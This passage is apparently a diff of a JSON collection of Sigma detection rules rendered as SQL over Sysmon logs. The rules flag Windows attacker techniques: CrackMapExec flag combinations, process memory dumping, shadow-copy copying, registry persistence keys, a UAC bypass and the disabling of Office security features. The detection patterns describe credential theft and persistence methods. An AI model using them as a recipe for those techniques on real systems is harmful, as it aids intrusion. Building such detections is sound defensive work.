'%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - 
"description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% 
-p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. 
Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR 
Details LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron 
Systems)", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. 
Anhaus, oscd.community", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "status": "experimental", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE 
'%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR Image LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE 
'%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' 
ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE 
'%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": 
"0bbc6369-43e3-453d-9944-cae58821c173", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of the startup key to a path 
